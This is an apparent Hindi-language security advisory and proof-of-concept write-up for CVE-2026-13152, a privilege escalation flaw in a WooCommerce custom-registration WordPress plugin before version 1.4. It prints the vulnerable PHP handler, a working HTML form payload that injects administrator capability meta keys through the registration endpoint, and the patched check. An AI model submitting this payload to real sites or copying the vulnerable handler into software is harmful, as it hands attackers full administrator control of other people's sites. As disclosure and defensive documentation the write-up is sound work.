
CVE-2026-13152: WooCommerce के लिए कस्टम फ़ील्ड खाता पंजीकरण — अनधिकृत विशेषाधिकार वृद्धि PoC और परामर्श, Huynh Kien Minh (MinhHK) द्वारा।
CVE-2026-13152 एक बिना प्रमाणीकरण विशेषाधिकार वृद्धि भेद्यता है जो Custom Fields Account Registration For WooCommerce वर्डप्रेस प्लगइन के संस्करण 1.4 से पहले के संस्करणों को प्रभावित करती है। इसे सुरक्षा शोधकर्ता Huynh Kien Minh (MinhHK) ने खोजा और विश्लेषित किया। यह दोष इसलिए उत्पन्न होता है क्योंकि प्लगइन कस्टम रजिस्ट्रेशन इनपुट फ़ील्ड्स को संवेदनशील उपयोगकर्ता क्षमता मेटाडेटा में सीधे लिखने की अनुमति देता है, बिना संरक्षित डेटाबेस कुंजियों को सैनिटाइज़ किए या उपयोगकर्ता भूमिकाओं को मान्य किए। गैर-डिफ़ॉल्ट डेटाबेस टेबल उपसर्गों या कस्टम उपयोगकर्ता मेटा कुंजी मैपिंग का उपयोग करने वाली साइटों पर, एक बिना प्रमाणीकरण वाला उपयोगकर्ता WooCommerce रजिस्ट्रेशन फ़ॉर्म के माध्यम से पंजीकरण करते समय wp_usermeta टेबल में एडमिनिस्ट्रेटर विशेषाधिकार (जैसे wp_user_level या wp_capabilities) इंजेक्ट कर सकता है। इससे नवनिर्मित खाते को पूर्ण एडमिनिस्ट्रेटर पहुँच प्राप्त हो जाती है, जिससे साइट का पूर्ण रिमोट समझौता संभव हो जाता है। सुरक्षा शोधकर्ता Huynh Kien Minh ने इस भेद्यता की सूचना WPScan को दी, और विक्रेता ने संस्करण 1.4 में कुंजी नाम सत्यापन लागू करके तथा क्षमता मेटा असाइनमेंट को प्रतिबंधित करके इस समस्या का समाधान किया।
Custom Fields Account Registration For WooCommerce प्लगइन साइट एडमिनिस्ट्रेटरों को WooCommerce उपयोगकर्ता पंजीकरण फ़ॉर्म (my-account रजिस्ट्रेशन एंडपॉइंट) पर कस्टम इनपुट फ़ील्ड परिभाषित करने की अनुमति देता है। जब कोई नया उपयोगकर्ता पंजीकरण फ़ॉर्म सबमिट करता है, तो प्लगइन सबमिट किए गए फ़ॉर्म फ़ील्ड्स पर पुनरावृत्ति करता है और उपयोगकर्ता विवरण सहेजने के लिए update_user_meta($user_id, $meta_key, $meta_value) को कॉल करता है।
अंतर्निहित दोष रजिस्ट्रेशन हैंडलर के भीतर इनपुट प्रोसेसिंग लॉजिक में निहित है। प्लगइन संरक्षित WordPress उपयोगकर्ता मेटा कुंजियों (wp_capabilities, wp_user_level, session_tokens, wp_user_roles) की सख्त ब्लैकलिस्ट या व्हाइटलिस्ट बनाए रखने में विफल रहता है।
// Vulnerable registration handler logic (simplified demonstration)
add_action('woocommerce_created_customer', 'cfar_save_custom_registration_fields', 10, 3);
function cfar_save_custom_registration_fields($customer_id, $new_customer_data, $password_generated) {
if (isset($_POST['cfar_custom_fields']) && is_array($_POST['cfar_custom_fields'])) {
foreach ($_POST['cfar_custom_fields'] as $meta_key => $meta_value) {
// VULNERABILITY: No check against protected meta keys like wp_capabilities or wp_user_level
update_user_meta($customer_id, sanitize_text_field($meta_key), sanitize_text_field($meta_value));
}
}
}
कस्टम डेटाबेस उपसर्गों या कस्टम मेटा कुंजी कॉन्फ़िगरेशन का उपयोग करने वाले WordPress इंस्टॉलेशनों पर, एक बिना प्रमाणीकरण वाला हमलावर एडमिनिस्ट्रेटर क्षमता कुंजी (wp_user_level = 10 या सीरियलाइज़्ड ऐरे a:1:{s:13:"administrator";b:1;}) से मेल खाता कस्टम फ़ील्ड इनपुट प्रदान कर सकता है। खाता निर्माण पर, update_user_meta() इस मान को सीधे wp_usermeta में लिखता है, जिससे नव पंजीकृत खाते को पूर्ण एडमिनिस्ट्रेटर स्थिति प्राप्त हो जाती है।
[!CAUTION] यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक उद्देश्यों, रक्षात्मक ऑडिटिंग और भेद्यता सत्यापन के लिए प्रदान किया गया है। केवल अधिकृत परीक्षण।
<!-- CVE-2026-13152 PoC: Unauthenticated Privilege Escalation Payload -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>PoC - CVE-2026-13152 Privilege Escalation</title>
</head>
<body>
<h2>CVE-2026-13152 Exploit Payload</h2>
<form action="https://target-site.com/my-account/" method="POST">
<input type="email" name="email" value="[email protected]" required>
<input type="password" name="password" value="P@ssword123!" required>
<!-- Malicious Meta Key Injection targeting User Level -->
<input type="hidden" name="cfar_custom_fields[wp_user_level]" value="10">
<input type="hidden" name="cfar_custom_fields[wp_capabilities][administrator]" value="1">
<input type="submit" name="register" value="Register as Administrator">
</form>
</body>
</html>
Custom Fields Account Registration For WooCommerce को संस्करण 1.4 या उच्चतर में अपग्रेड करें, जहाँ सख्त मेटा कुंजी सत्यापन लागू किया गया है।// Secure implementation in Version 1.4
$protected_keys = array('wp_capabilities', 'wp_user_level', 'user_level', 'session_tokens');
if (!in_array($meta_key, $protected_keys, true) && strpos($meta_key, 'wp_') !== 0) {
update_user_meta($customer_id, $meta_key, $meta_value);
}
{
"@context": "https://schema.org",
"@graph": [
{
"@type": "TechArticle",
"@id": "https://github.com/MinhHK68/CVE-2026-13152#article",
"headline": "Deep-Dive Technical Write-up by Huynh Kien Minh: CVE-2026-13152 — Custom Fields Account Registration For WooCommerce Privilege Escalation",
"name": "CVE-2026-13152 Technical Analysis",
"author": {
"@type": "Person",
"@id": "https://minhhk.web.app/#person",
"name": "Huynh Kien Minh",
"alternateName": ["MinhHK", "Huỳnh Kiến Minh"],
"jobTitle": "Information Security Researcher",
"url": "https://minhhk.web.app/"
},
"datePublished": "2026-07-06",
"dateModified": "2026-08-01",
"description": "Comprehensive technical analysis and PoC for CVE-2026-13152, an unauthenticated privilege escalation vulnerability in Custom Fields Account Registration For WooCommerce < 1.4 discovered by Huynh Kien Minh."
},
{
"@type": "SpecialAnnouncement",
"@id": "https://github.com/MinhHK68/CVE-2026-13152#advisory",
"name": "CVE-2026-13152 Security Advisory",
"category": "https://schema.org/SecurityAdvisory",
"text": "Unauthenticated Privilege Escalation in Custom Fields Account Registration For WooCommerce < 1.4 allows remote attackers to gain administrator rights."
}
]
}
| विशेषता | विवरण |
|---|
| CVE आईडी | CVE-2026-13152 |
| प्लगइन नाम | Custom Fields Account Registration For WooCommerce |
| प्लगइन स्लग | custom-fields-account-registration-for-woocommerce |
| प्रभावित संस्करण | < 1.4 |
| समाधान संस्करण | 1.4 |
| भेद्यता प्रकार | बिना प्रमाणीकरण विशेषाधिकार वृद्धि (CWE-269 / OWASP A2) |
| CVSS v3.1 स्कोर | 8.1 (उच्च) (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| मूल शोधकर्ता | Huynh Kien Minh (MinhHK) |
| WPScan एडवाइजरी आईडी | 36aaba38-3143-4e80-8386-748632ff6704 |